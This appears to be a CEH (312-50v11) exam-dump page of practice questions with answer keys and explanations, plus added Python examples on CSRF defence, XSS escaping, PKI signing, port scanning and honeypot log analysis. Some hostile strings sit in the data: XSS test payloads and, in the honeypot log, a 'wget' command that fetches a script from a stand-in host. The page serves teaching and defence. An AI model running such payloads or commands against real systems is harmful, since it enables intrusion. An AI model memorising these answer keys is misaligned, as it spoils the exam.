312-50v11 ECCouncil Exam Dumps & Practice Test Questions
A user was logged into their online banking session when they clicked a link in an email that took them to a cat video. Shortly after, they received a message from their bank alerting them to suspicious account activity.
What browser security vulnerability was most likely exploited?
A. Clickjacking
B. Cross-Site Scripting
C. Cross-Site Request Forgery
D. Web Form Input Validation
Correct Answer: C
Explanation:
This scenario highlights a stealthy browser-based attack where the user performs a seemingly harmless action—clicking on a link—only to later discover that their bank account has been accessed without their knowledge. The key here is recognizing that the user was already authenticated with their bank and that unauthorized actions occurred without additional user interaction after visiting another site. This points directly to Cross-Site Request Forgery (CSRF) as the exploited vulnerability.
CSRF takes advantage of the trust a website (such as a bank) has in the user’s browser. When a user logs into their banking site, an authentication session cookie is stored in the browser. If the user visits a malicious site while this session is still active, the malicious site can send forged HTTP requests to the banking site. Since the browser automatically includes the session cookie in the request, the bank believes the request is legitimate—even though the user never knowingly authorized it.
In this case:
The user clicked a link to watch a cat video hosted on a malicious or compromised site.
That site included hidden elements, such as an invisible form or script, that silently submitted a transaction to the bank using the user’s active session.
As a result, a transaction was completed without the user’s knowledge.
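The following is an added example (not code from the original page) that models the forged-request mechanism just described on the server side. It assumes a hypothetical bank origin `https://bank.example`, an in-memory session store, and a `Request` stand-in for an HTTP POST; the names `transfer_vulnerable` and `transfer_hardened` are constructed for the example. The vulnerable handler trusts the automatically attached session cookie alone; the hardened one also requires a per-session anti-CSRF token and a matching Origin header, which a page on another site cannot supply.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

# Constructed in-memory session store for the example: session id -> Session.
SESSIONS = {}

BANK_ORIGIN = "https://bank.example"   # assumed origin of the bank's own pages


@dataclass
class Session:
    user: str
    # Per-session anti-CSRF token; only pages served by the bank can read it.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Minimal stand-in for an HTTP POST as the bank's server receives it."""
    cookies: dict              # attached by the browser to every request for the bank
    form: dict                 # body built by whichever page submitted the form
    origin: Optional[str]      # Origin header; browsers add it to cross-site POSTs


def login(user: str) -> str:
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = Session(user)
    return sid


def transfer_vulnerable(req: Request) -> str:
    """Trusts the session cookie alone, so any page that can make the
    browser POST here has the transfer executed as the logged-in user."""
    sess = SESSIONS.get(req.cookies.get("session"))
    if sess is None:
        return "401 not logged in"
    return f"200 moved {req.form['amount']} from {sess.user} to {req.form['to']}"


def transfer_hardened(req: Request) -> str:
    """Demands evidence that the bank's own page built the request: a
    matching Origin header and the per-session token in the body."""
    sess = SESSIONS.get(req.cookies.get("session"))
    if sess is None:
        return "401 not logged in"
    if req.origin != BANK_ORIGIN:
        return "403 cross-site origin rejected"
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, sess.csrf_token):
        return "403 missing or invalid CSRF token"
    return f"200 moved {req.form['amount']} from {sess.user} to {req.form['to']}"


def demo() -> dict:
    sid = login("alice")
    # Forged request: the cat-video page auto-submits a hidden form. The
    # browser attaches alice's cookie, but the page cannot read her token
    # and the browser reports the page's real origin.
    forged = Request(cookies={"session": sid},
                     form={"to": "mule-account", "amount": "1000"},
                     origin="https://cat-videos.example")
    # Genuine request from the bank's transfer page, token included.
    genuine = Request(cookies={"session": sid},
                      form={"to": "bob", "amount": "50",
                            "csrf_token": SESSIONS[sid].csrf_token},
                      origin=BANK_ORIGIN)
    return {
        "vulnerable_forged": transfer_vulnerable(forged),
        "hardened_forged": transfer_hardened(forged),
        "hardened_genuine": transfer_hardened(genuine),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

Running `demo()` shows the forged request accepted by the vulnerable handler and rejected by the hardened one, while the genuine request still succeeds. In a real deployment the token check is complemented by marking the session cookie `SameSite=Lax` or `SameSite=Strict`, so the browser itself stops attaching it to cross-site POSTs.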
Now, let’s evaluate the incorrect options:
A. Clickjacking involves tricking the user into clicking something they didn’t intend to by overlaying transparent frames. This attack requires deliberate user interaction, which wasn’t the case here.
B. Cross-Site Scripting (XSS) is an injection attack where malicious JavaScript runs on a vulnerable website. This would require a flaw in the bank’s website, which the scenario doesn’t indicate.
D. Web Form Input Validation focuses on protecting websites from incorrect or malicious data input, often relevant to SQL injection or XSS. It is unrelated to unauthorized requests from a third-party site.
The scenario clearly illustrates how CSRF allows attackers to exploit a logged-in session through a secondary website, leading to unintended actions on behalf of the user. It’s subtle, browser-based, and perfectly matches the described behavior.
Within the structure of a Public Key Infrastructure (PKI), which component is tasked with verifying and certifying the identity of individuals or organizations before issuing digital certificates?
A. KDC
B. CR
C. CBC
D. CA
Correct Answer: D
Explanation:
Public Key Infrastructure (PKI) is a framework that manages digital certificates and public-key encryption. Its goal is to secure digital communications by confirming the identity of users, servers, and devices, and by enabling encrypted communication. At the center of PKI is the Certificate Authority (CA), the entity responsible for verifying identities and issuing certificates that bind public keys to specific individuals or organizations.
The CA acts as a trusted third party. Before issuing a certificate, it conducts a verification process appropriate to the certificate’s type. For Domain Validation (DV), it checks domain ownership. For Organization Validation (OV) and Extended Validation (EV), it performs more rigorous background checks to confirm legal identity and business credentials. Once verified, the CA signs the certificate with its private key. This digital signature allows anyone to verify its authenticity using the CA’s public key.
The certificate contains key information such as:
The subject (owner) of the certificate
The public key of the subject
The validity period
The issuer (the CA)
The digital signature of the CA
When a web browser encounters a certificate during an HTTPS session, it checks the certificate’s validity and whether it was signed by a trusted CA. If the checks pass, the browser uses the certificate’s public key to set up the encrypted session.
Let’s consider why the other options are incorrect:
A. KDC (Key Distribution Center) is part of the Kerberos authentication protocol, not PKI. It issues session keys, not digital certificates, and does not perform identity verification for certificates.
B. CR (likely intended to reference CRL, or Certificate Revocation List) is a mechanism within PKI to invalidate certificates before expiration. It helps manage certificate trust but does not issue or verify identities.
C. CBC (Cipher Block Chaining) is a mode of encryption, used with symmetric block ciphers like AES. It has no function in identity verification or certificate management.
In short, the CA is the authoritative source in a PKI system that ensures digital certificates are issued only after a thorough identity verification process, helping users establish secure and trusted communications across the internet.
Which kind of web attack targets users by inserting malicious scripts into dynamic web content, leading those scripts to be executed in the browsers of unsuspecting visitors?
A. LDAP Injection
B. Cross-Site Scripting (XSS)
C. SQL Injection
D. Cross-Site Request Forgery (CSRF)
Correct Answer: B
Explanation:
Cross-Site Scripting (XSS) is a type of web application vulnerability that allows attackers to inject malicious client-side scripts—typically JavaScript—into content that is later rendered in other users’ web browsers. This attack exploits websites that dynamically generate content without properly sanitizing user inputs.
There are several variations of XSS:
Stored XSS: The malicious script is permanently stored on the server (e.g., in a database) and delivered to users each time they visit a particular page.
Reflected XSS: The script is reflected back immediately in the web server’s response (e.g., via a query string or form submission).
DOM-based XSS: The script’s behavior is handled entirely on the client side, leveraging the Document Object Model (DOM) and vulnerable JavaScript code.
In all cases, the script runs in the context of a trusted website and can do things like steal session cookies, log keystrokes, or redirect users to phishing pages. What makes XSS especially dangerous is that it does not rely on the server being directly attacked—it instead exploits the trust users have in a legitimate website.
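Added example (not from the original page) showing the stored-XSS failure mode and its fix at the rendering step. The comment list, page template and the two textbook test strings are constructed for the example; `render_unsafe`, `render_safe` and `safe_link` are hypothetical names. The point it demonstrates beyond the text: the fix is context-aware output encoding, and a URL attribute needs a scheme check on top of entity encoding.

```python
import html

# Constructed stored-XSS scenario: comments submitted by users are saved and
# later rendered into the page every visitor sees. The two payloads are
# textbook test strings, not anything taken from the original page.
COMMENTS = [
    "Great article!",
    "<script>alert(document.cookie)</script>",
    '<img src=x onerror="alert(1)">',
]

PAGE_TEMPLATE = "<h1>Comments</h1>\n<ul>\n{items}\n</ul>"


def render_unsafe(comments):
    """Vulnerable: untrusted text is concatenated straight into the HTML, so
    any markup inside a comment becomes live markup in the visitor's browser."""
    items = "\n".join(f"<li>{c}</li>" for c in comments)
    return PAGE_TEMPLATE.format(items=items)


def render_safe(comments):
    """Hardened: each untrusted value is entity-encoded for the context it
    lands in (element text), so <, >, &, " and ' are displayed, not parsed."""
    items = "\n".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments)
    return PAGE_TEMPLATE.format(items=items)


def safe_link(label, url):
    """Attribute/URL context needs more than entity encoding: a
    'javascript:' URL passes html.escape untouched but still executes when
    clicked, so only http(s) URLs are allowed through."""
    if not url.lower().startswith(("http://", "https://")):
        url = "#"
    return (f'<a href="{html.escape(url, quote=True)}">'
            f'{html.escape(label, quote=True)}</a>')


def contains_injected_tag(page):
    """Illustrative check: did a comment's markup survive as a real tag?"""
    lowered = page.lower()
    return "<script" in lowered or "<img" in lowered


if __name__ == "__main__":
    print(render_unsafe(COMMENTS))
    print(render_safe(COMMENTS))
    print(safe_link("profile", "javascript:alert(1)"))
```

`render_safe` is the pattern template engines apply by default when auto-escaping is on; the bug in `render_unsafe` is exactly what turning auto-escaping off (or building HTML with string concatenation) reintroduces.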
Let’s look at why the other options don’t apply:
A. LDAP Injection: This attack exploits vulnerabilities in LDAP queries, not in client browsers. It's used for unauthorized access or query manipulation in directory services like Active Directory.
C. SQL Injection: SQLi allows attackers to manipulate database queries, potentially gaining access to or modifying backend data. It’s a server-side attack and doesn't involve injecting scripts into pages for browser execution.
D. Cross-Site Request Forgery (CSRF): CSRF tricks a user into performing actions without their knowledge on a site where they are authenticated. It relies on the user's existing session, not on script injection.
In conclusion, only XSS matches the scenario described—injecting code that runs in the browser of other users. It targets the presentation layer of web applications and often results in theft of credentials or sensitive data.
If a user encrypts an email using PKI so that only the recipient can decrypt it, at which layer of the OSI model does this encryption and decryption take place?
A. Application
B. Transport
C. Session
D. Presentation
Correct Answer: A
Explanation:
This question addresses the use of Public Key Infrastructure (PKI) to secure email communications, specifically focusing on the OSI layer where encryption and decryption take place. When a user secures an email with PKI, it usually involves encrypting the content at the software (application) level using the recipient’s public key, ensuring only the recipient—with the corresponding private key—can decrypt it.
In this context, the Application layer of the OSI model is where this action occurs. This layer is responsible for end-user services like email, file transfer, and web browsing. When an email is sent using encryption protocols such as S/MIME or PGP, the encryption is handled directly by the email client, such as Outlook or Thunderbird. That client uses PKI to secure the message before it even reaches the network. The recipient’s client then performs decryption once the email is received.
Let’s analyze the incorrect options:
B. Transport: This layer is responsible for data transmission reliability using protocols like TCP and UDP. While TLS encryption may operate here to secure channels (e.g., HTTPS), it doesn’t encrypt the actual content of the message—only the data stream in transit.
C. Session: This layer manages sessions or connections between applications. While it can play a role in initiating secure communications, the actual encryption and decryption of data is not performed here.
D. Presentation: This layer is sometimes responsible for data transformation functions like encryption and compression, but in modern architectures, application-level tools handle these processes directly, especially when using PKI-based systems like S/MIME.
Ultimately, since encryption and decryption in this scenario are performed by the email application itself, and are tied to user actions and software interfaces, the correct layer is the Application layer. This matches how modern secure email communication functions in real-world implementations.
Therefore, the correct answer is A.
A newly added wireless device can detect an 802.11 Wi-Fi network but fails to connect to it. Packet capture shows that the Access Point is ignoring the association requests sent by the device.
The same setup works for other similar clients. What is the most likely cause of this behavior?
A. The Access Point does not recognize the client's MAC address
B. The client cannot detect the SSID of the network
C. The client is tuned to the incorrect wireless channel
D. The client is not configured to obtain an IP address via DHCP
Correct Answer: A
Explanation:
This scenario revolves around a wireless client that can detect the network but cannot establish a connection, even though other identical clients are functioning properly. Importantly, packet sniffing reveals that the Access Point (AP) is not replying to association requests, which is a crucial clue.
This behavior typically indicates that the client is actively attempting to associate, meaning it has successfully detected the SSID and is on the correct frequency/channel. However, the AP is ignoring or rejecting the association request, which implies a deliberate decision by the AP not to allow the client to join.
The most common reason for this is MAC address filtering, making Option A the correct choice. When MAC filtering is enabled on the AP, only pre-approved MAC addresses are allowed to associate; requests from any other device are dropped silently, even though the device can see the network and attempt to connect. This kind of filtering adds a layer of access control and is often used in corporate or high-security environments, though on its own it is a weak control, since a MAC address is easily spoofed.
Let’s examine why the other options are incorrect:
Option B: If the client couldn’t see the SSID, it wouldn’t even attempt to associate unless manually configured. Since it’s actively sending association requests, this clearly isn’t the issue.
Option C: Being on the wrong channel would prevent the client from detecting the network entirely. Again, the fact that it sees the SSID and sends requests rules this out.
Option D: DHCP is involved after the association and authentication stages. If DHCP were misconfigured, the client would connect but fail to obtain a valid IP address. It would not stop the AP from replying to association attempts.
In conclusion, the most plausible explanation is that the Access Point is deliberately refusing the connection because the client’s MAC address is not included in its allowlist. This explains why other clients work (they are on the list), while the new one does not.
You are using the Nmap tool to scan a system for open ports, but you want to scan fewer ports than the default for a faster result. Which Nmap option allows you to perform this limited, faster scan?
A. -r
B. -F
C. -P
D. -sP
Correct Answer: B
Explanation:
Nmap is a well-known network scanning tool used by security professionals to identify open ports, services, and vulnerabilities. By default, when you run a basic scan, Nmap checks the 1,000 most commonly used ports to balance thoroughness and performance.
However, there are scenarios—like routine network maintenance or time-constrained audits—where you may want to speed up the scan by reducing the number of ports it checks. This is where the -F option becomes valuable.
The -F flag stands for Fast scan. When used, it tells Nmap to scan only the 100 most common ports, as ranked by frequency in the nmap-services file, instead of the default 1,000. This results in a much quicker scan compared to the default 1,000-port sweep.
Let’s review the other options and why they are incorrect:
Option A (-r): This option disables Nmap’s default randomization of the port scanning sequence. While it changes the order in which ports are scanned, it does not reduce the number of ports being scanned.
Option C (-P): This is not a valid standalone Nmap switch. There are related flags like -PE, -PP, and -PS, which are used for host discovery (ping scans), not port scans. None of these reduce the port scan count.
Option D (-sP): This used to be the flag for a ping scan (now replaced by -sn). It tells Nmap to only discover hosts without scanning any ports at all. While this does reduce scan time, it does not fulfill the requirement of scanning fewer ports—it actually skips port scanning entirely.
Therefore, if your goal is to perform a quicker scan that still checks for open ports, the correct and most efficient choice is -F. It’s a practical and commonly used flag for fast scanning in time-sensitive or low-bandwidth environments.
Which structure is used specifically to confirm and verify the identity of individuals involved in data communication within an organization?
A. SOA
B. Biometrics
C. Single Sign-On
D. PKI
Correct Answer: D
Explanation:
The most accurate and complete solution for securely verifying the identity of individuals during digital communication is PKI (Public Key Infrastructure). PKI is not just a simple tool—it is a comprehensive framework that supports secure information exchange by authenticating identities using cryptographic keys and digital certificates.
At its core, PKI works by issuing digital certificates that bind a user’s identity to a cryptographic public key. These certificates are issued and managed by Certificate Authorities (CAs), which act as trusted third parties. When someone receives a digitally signed message, they can verify the sender’s identity by confirming that the certificate was issued by a trusted CA and has not been revoked.
Key PKI components include:
Public/private key pairs – Individuals hold private keys securely and share public keys via certificates.
Certificate Authority (CA) – Validates identity and issues digital certificates.
Registration Authority (RA) – Assists in identity verification before certificate issuance.
Digital Certificates – Contain identity information, public keys, and validity.
Certificate Revocation Lists (CRLs) – Used to invalidate certificates when necessary.
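Added example (not from the original page) that walks through the certificate lifecycle described in this explanation and in the earlier CA question: a CA signs a certificate binding a subject to a public key, and a relying party checks the trust store, validity period, revocation list and signature with the CA's public key. It uses textbook RSA with small primes to keep the arithmetic visible; that key size, the "Example Root CA" name, the subject names and the epoch timestamp are all constructed for the example, and the CRL is keyed by issuer and subject rather than by serial number as a real CRL would be.

```python
import hashlib

# Textbook RSA with small primes. It shows the sign/verify arithmetic only:
# a real CA key is 2048-bit RSA or an elliptic-curve key, never this size.
def toy_keypair(p=104729, q=104723, e=65537):
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)                 # private exponent (Python 3.8+)
    return {"n": n, "e": e}, {"n": n, "d": d}


def digest_int(data: bytes, n: int) -> int:
    """Hash the to-be-signed bytes and reduce into the toy modulus."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def serialize(fields: dict) -> bytes:
    """Deterministic byte form of the certificate fields (sorted keys)."""
    return "|".join(f"{k}={fields[k]}" for k in sorted(fields)).encode()


def ca_issue(ca_name, ca_priv, subject, subject_pub, not_before, not_after):
    """After verifying the subject's identity, the CA binds subject and
    public key together and signs the result with its private key."""
    tbs = {"subject": subject, "public_key": subject_pub, "issuer": ca_name,
           "not_before": not_before, "not_after": not_after}
    sig = pow(digest_int(serialize(tbs), ca_priv["n"]), ca_priv["d"], ca_priv["n"])
    return {**tbs, "signature": sig}


def verify_certificate(cert, trust_store, now, revoked=frozenset()):
    """The relying party's checks: issuer is a trusted CA, the certificate
    is inside its validity window, it is not on the CRL, and the signature
    verifies under the CA's public key."""
    ca_pub = trust_store.get(cert["issuer"])
    if ca_pub is None:
        return "untrusted issuer"
    if not cert["not_before"] <= now <= cert["not_after"]:
        return "outside validity period"
    if (cert["issuer"], cert["subject"]) in revoked:      # toy CRL keyed by issuer+subject
        return "revoked"
    tbs = {k: v for k, v in cert.items() if k != "signature"}
    if pow(cert["signature"], ca_pub["e"], ca_pub["n"]) != digest_int(serialize(tbs), ca_pub["n"]):
        return "bad signature"
    return "valid"


def demo():
    ca_pub, ca_priv = toy_keypair()
    trust_store = {"Example Root CA": ca_pub}        # the browser's root store
    subj_pub, _subj_priv = toy_keypair(p=1009, q=1013)
    now = 1_700_000_000                               # constructed epoch time
    cert = ca_issue("Example Root CA", ca_priv, "CN=alice@example.org",
                    f"rsa:{subj_pub['n']}:{subj_pub['e']}",
                    not_before=now - 86400, not_after=now + 365 * 86400)
    tampered = dict(cert, subject="CN=mallory@example.org")  # edited without the CA key
    crl = {("Example Root CA", "CN=alice@example.org")}
    return {
        "genuine": verify_certificate(cert, trust_store, now),
        "tampered": verify_certificate(tampered, trust_store, now),
        "expired": verify_certificate(cert, trust_store, now + 400 * 86400),
        "revoked": verify_certificate(cert, trust_store, now, revoked=crl),
        "unknown_ca": verify_certificate(cert, {}, now),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case}: {result}")
```

The tampered case is the one that shows why the CA signature matters: changing any signed field without the CA's private key breaks verification, so the binding between identity and public key cannot be altered after issuance.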
Now, let’s assess the incorrect options:
A. SOA (Service-Oriented Architecture):
This is a software design principle, not a security framework. It promotes interoperability among services but does not include identity authentication mechanisms like PKI does.
B. Biometrics:
While biometrics are effective authentication mechanisms (e.g., fingerprint, facial recognition), they are not part of a full cryptographic system for verifying identity over networks. They can complement a PKI system but cannot replace its structure or scope.
C. Single Sign-On (SSO):
SSO simplifies user access across multiple applications by requiring only one login. However, it depends on authentication technologies like PKI or Kerberos to function securely. It is an access method, not a full framework for identity verification across data exchanges.
In conclusion, PKI provides the full-stack cryptographic infrastructure necessary for verifying identities in secure digital communications. It is a trusted standard for securing websites (HTTPS), authenticating emails (S/MIME), signing software, and much more.
During a penetration test, you impersonate an executive in an email to the receptionist, trick her into sending a document, modify it with malicious links, and get her to click on them—resulting in a system compromise.
What attack method does this represent?
A. Social Engineering
B. Piggybacking
C. Tailgating
D. Eavesdropping
Correct Answer: A
Explanation:
The situation described is a textbook case of social engineering, a form of attack where the adversary manipulates human behavior to gain unauthorized access to systems or data. In penetration testing, this method tests not just technical safeguards but also the human element of security.
Here’s the breakdown of the steps:
Reconnaissance – The attacker locates employee information (email, position) via public resources.
Impersonation (Spoofing) – An email is sent to the receptionist pretending to be from her boss—a common authority-based tactic.
Deception & Payload Delivery – The legitimate PDF is returned, modified to include malicious links. This alteration is masked under plausible instructions.
User Action – The receptionist, trusting the sender, clicks the links—resulting in malware execution and system access.
This demonstrates psychological manipulation, relying on trust, urgency, or obedience to authority, rather than brute force or technical vulnerabilities.
Let’s rule out the incorrect choices:
B. Piggybacking:
This involves gaining physical access by entering a secure area with consent from an authorized person. It’s a physical attack, not digital.
C. Tailgating:
Similar to piggybacking, but occurs without consent—such as sneaking through a secure door behind someone. Again, this is about physical intrusion, unrelated to email or malware.
D. Eavesdropping:
This refers to intercepting private communications such as phone calls, voice transmissions, or unencrypted network traffic. It is a passive attack and doesn’t involve tricking someone into clicking or executing code.
The scenario is entirely based on human manipulation via email, exploiting trust to trigger a technical compromise. This perfectly fits the definition of social engineering—a top concern in both cybersecurity training and red team operations.
Which of the following types of scanning focuses specifically on identifying open ports and services running on a target system?
A. Vulnerability scanning
B. Port scanning
C. Network mapping
D. Banner grabbing
Correct Answer: B
Explanation:
In ethical hacking, different scanning techniques are used to gather intelligence about a target system. One of the foundational scanning methods is port scanning, which is crucial for identifying which ports on a target machine are open and what services are running on those ports. This activity is part of the Reconnaissance and Scanning phases of the ethical hacking methodology.
Port scanning is typically performed using tools like Nmap, Masscan, or Netcat. These tools send packets to specific ports on a system to check if they are open (accepting connections), closed (rejecting connections), or filtered (protected by a firewall). The goal is to enumerate possible entry points that an attacker—or an ethical hacker—can further investigate for vulnerabilities.
Let’s examine the other options:
A: Vulnerability scanning involves checking systems for known vulnerabilities, such as outdated software, misconfigurations, or missing patches. While it may include port scanning as a preliminary step, its primary focus is identifying weaknesses rather than open ports.
C: Network mapping (or network discovery) is about creating a visual or logical map of a network's topology, showing how hosts are interconnected. It may involve ping sweeps and traceroutes but doesn’t necessarily scan ports in detail.
D: Banner grabbing is a technique used after identifying open ports. It involves connecting to services and capturing banners (text messages returned by services), which may reveal software versions and other information useful for further analysis.
In summary, while all these techniques have their place in a penetration test, port scanning is the specific process used to identify open ports and services, which is often a precursor to deeper vulnerability assessments. Understanding this distinction is crucial for passing the CEH exam and for performing responsible, accurate ethical hacking.
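Added example (not code from the page or from the Nmap project) tying this explanation to the earlier Nmap -F question: a minimal TCP connect scanner that classifies each port as open, closed or filtered from the socket outcome, run against a throwaway listener on 127.0.0.1 so it works offline. The two port lists are constructed stand-ins for the default 1,000-port sweep and the -F list; the real nmap-services ranking is not reproduced here, and `probe`, `scan` and `demo` are hypothetical names.

```python
import socket
from concurrent.futures import ThreadPoolExecutor

# Constructed stand-ins for Nmap's port lists. The default sweep covers the
# 1,000 most common ports and -F the top 100; the only difference is which
# list is handed to the same probe loop. These short lists are illustrative
# and are not Nmap's real nmap-services ordering.
DEFAULT_PORTS = [21, 22, 23, 25, 53, 80, 110, 143, 443, 445, 993, 3306, 3389, 8080]
FAST_PORTS = DEFAULT_PORTS[:5]


def probe(host, port, timeout=0.5):
    """One TCP connect probe, reported with Nmap's three port states:
    open (handshake completed), closed (RST / connection refused),
    filtered (no answer, typically a firewall dropping the packet)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except (socket.timeout, TimeoutError):
        return "filtered"
    except OSError:
        return "filtered"      # e.g. host unreachable: no usable answer either
    finally:
        s.close()


def scan(host, ports, workers=20):
    """Probe every port in the list concurrently; returns {port: state}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe(host, p), ports))
    return dict(zip(ports, states))


def open_listener():
    """Throwaway local listener on an OS-chosen port, so the scan has a
    known-open target (constructed for the example, not a real service)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv


def demo(fast=True):
    """Scan 127.0.0.1 with the fast or the default list plus the listener's
    port; returns (listener_port, results)."""
    srv = open_listener()
    port = srv.getsockname()[1]
    ports = FAST_PORTS if fast else DEFAULT_PORTS
    try:
        result = scan("127.0.0.1", [port] + [p for p in ports if p != port])
    finally:
        srv.close()
    return port, result


if __name__ == "__main__":
    listener, states = demo()
    for p, st in sorted(states.items()):
        print(f"{p:>5}/tcp {st}" + ("   <- our listener" if p == listener else ""))
```

A connect scan completes the handshake and so appears in the target's service logs, which is also why it is the easiest scan type for a defender to spot; the same classification, applied to many hosts and ports in a short window, is the signature most IDS port-scan detectors key on.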
What is the primary purpose of using a honeypot in a cybersecurity environment?
A. To prevent phishing attacks
B. To accelerate network performance
C. To detect, lure, and analyze attackers
D. To automatically block malware at the firewall
Correct Answer: C
Explanation:
A honeypot is a security mechanism designed to appear as a legitimate part of the network but is actually a decoy system meant to attract attackers. Its core purpose is to detect, deceive, and analyze unauthorized access attempts in order to gather intelligence on malicious activities.
When deployed correctly, a honeypot simulates a vulnerable service, application, or server. Attackers who stumble upon it may assume it’s a real target and attempt to exploit it. Meanwhile, the system records all their actions—such as payloads used, IP addresses, and techniques attempted—without putting actual production data at risk.
Let’s evaluate the incorrect answers:
A: To prevent phishing attacks
Phishing is a form of social engineering that targets users rather than systems. While a honeypot may record phishing attempts if configured for that purpose, its main objective is not phishing prevention.
B: To accelerate network performance
This has nothing to do with honeypots. Performance optimization involves quality of service (QoS), load balancing, or content delivery networks (CDNs)—not honeypots.
D: To automatically block malware at the firewall
Firewalls and intrusion prevention systems (IPS) perform automated blocking. Honeypots, on the other hand, are passive tools. They monitor and log data, but do not automatically block attacks. Their goal is insight, not prevention.
By analyzing interactions with the honeypot, security teams can identify new threats, evaluate attacker behavior, and improve defenses. This intelligence is particularly useful in understanding zero-day exploits or new malware strains.
For the CEH exam, it's important to recognize that honeypots are intelligence-gathering tools, not active defense mechanisms. Their role is to lure attackers, observe them in a controlled environment, and collect data that informs better threat mitigation strategies.
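Added example (not from the original page) of the analysis step this explanation ends on: turning a honeypot's recorded interactions into per-source verdicts and indicators. The JSON-lines log, the source addresses (documentation ranges), the event schema and the classification thresholds are all constructed for the example, and `profile_sources`, `classify` and `summarize` are hypothetical names; a real honeypot such as a decoy SSH service would emit richer records, but the aggregation is the same.

```python
import json
from collections import defaultdict

# Constructed honeypot event log (JSON lines), in the style a decoy
# SSH/telnet service might emit: who connected, what credentials they
# tried, and what commands they ran. Addresses are from documentation ranges.
HONEYPOT_LOG = """
{"ts": "2024-05-01T10:00:01Z", "src": "203.0.113.5", "port": 22, "event": "connect"}
{"ts": "2024-05-01T10:00:02Z", "src": "203.0.113.5", "port": 23, "event": "connect"}
{"ts": "2024-05-01T10:00:02Z", "src": "203.0.113.5", "port": 3389, "event": "connect"}
{"ts": "2024-05-01T10:00:03Z", "src": "203.0.113.5", "port": 445, "event": "connect"}
{"ts": "2024-05-01T10:05:00Z", "src": "198.51.100.7", "port": 22, "event": "login", "user": "root", "password": "123456"}
{"ts": "2024-05-01T10:05:01Z", "src": "198.51.100.7", "port": 22, "event": "login", "user": "root", "password": "admin"}
{"ts": "2024-05-01T10:05:02Z", "src": "198.51.100.7", "port": 22, "event": "login", "user": "admin", "password": "admin"}
{"ts": "2024-05-01T10:05:03Z", "src": "198.51.100.7", "port": 22, "event": "login", "user": "pi", "password": "raspberry"}
{"ts": "2024-05-01T10:05:04Z", "src": "198.51.100.7", "port": 22, "event": "login", "user": "root", "password": "toor"}
{"ts": "2024-05-01T11:00:00Z", "src": "192.0.2.9", "port": 22, "event": "login", "user": "root", "password": "root"}
{"ts": "2024-05-01T11:00:05Z", "src": "192.0.2.9", "port": 22, "event": "command", "cmd": "uname -a"}
{"ts": "2024-05-01T11:00:09Z", "src": "192.0.2.9", "port": 22, "event": "command", "cmd": "wget http://198.51.100.200/x.sh"}
"""


def parse(log_text):
    """Yield one event dict per non-empty JSON line."""
    for line in log_text.strip().splitlines():
        if line.strip():
            yield json.loads(line)


def profile_sources(events):
    """Aggregate everything the honeypot saw, keyed by source address."""
    profiles = defaultdict(lambda: {"ports": set(), "logins": 0,
                                    "creds": set(), "commands": []})
    for e in events:
        p = profiles[e["src"]]
        p["ports"].add(e["port"])
        if e["event"] == "login":
            p["logins"] += 1
            p["creds"].add((e["user"], e["password"]))
        elif e["event"] == "command":
            p["commands"].append(e["cmd"])
    return profiles


def classify(profile, scan_ports=3, brute_logins=5):
    """Verdict per source. Thresholds are constructed for the example;
    a real deployment tunes them against its own baseline."""
    if profile["commands"]:
        return "interactive intruder"      # got a shell and started acting
    if profile["logins"] >= brute_logins:
        return "credential brute force"
    if len(profile["ports"]) >= scan_ports:
        return "port scanner"
    return "low-volume probe"


def summarize(log_text=HONEYPOT_LOG):
    """Per-source verdicts plus indicators worth feeding into detection
    rules: credentials tried and any URLs that appeared in commands."""
    out = {}
    for src, prof in profile_sources(parse(log_text)).items():
        out[src] = {
            "verdict": classify(prof),
            "ports": sorted(prof["ports"]),
            "credentials_tried": sorted(prof["creds"]),
            "urls": [tok for c in prof["commands"]
                     for tok in c.split() if tok.startswith("http")],
        }
    return out


if __name__ == "__main__":
    for src, info in summarize().items():
        print(src, info["verdict"], info["urls"])
```

The URLs and credential pairs the summary extracts are the kind of indicators a team would push to blocklists and detection rules on production systems; the honeypot itself, as the explanation notes, only observed and recorded.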